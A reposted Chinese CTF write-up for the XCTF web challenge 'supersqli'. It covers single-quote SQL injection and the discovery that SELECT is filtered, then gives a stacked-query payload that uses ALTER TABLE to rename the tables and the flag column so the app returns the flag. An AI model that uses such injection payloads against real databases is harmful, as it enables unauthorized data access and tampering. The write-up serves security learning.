码迷,mamicode.com
首页 > 数据库 > 详细

xctf-web supersqli

时间:2020-04-07 09:57:41      阅读:240      评论:0      收藏:0      [点我收藏+]

标签:union   img   where   load   堆叠   order by   关键字   column   字段   

技术图片

单引号注入,用order by查到了两个column。用union select的时候发现select关键字被过滤了

技术图片

用分号尝试堆叠注入显示出了两张表

 

技术图片

分别查询字段

技术图片

技术图片

flag在表1919810931114514中

方法一:

words中有字段id,id应该为表单查询语句中的查询字段。可以猜测sql语句为:select * from words where id=‘‘;

因为没有限制alter,rename和change。所以可以通过修改表名来查flag。只需要把原本的words改成其他名字,1919810931114514表改为words,然后把字段flag改为id即可

 

payload:

1‘;alter table words rename to (任意名称);

alter table `1919810931114514` rename to words;

alter table words change flag id varchar(20);--+

(妙啊~~)

其他方法后续更新

xctf-web supersqli

标签:union   img   where   load   堆叠   order by   关键字   column   字段   

原文地址:https://www.cnblogs.com/remon535/p/12651327.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!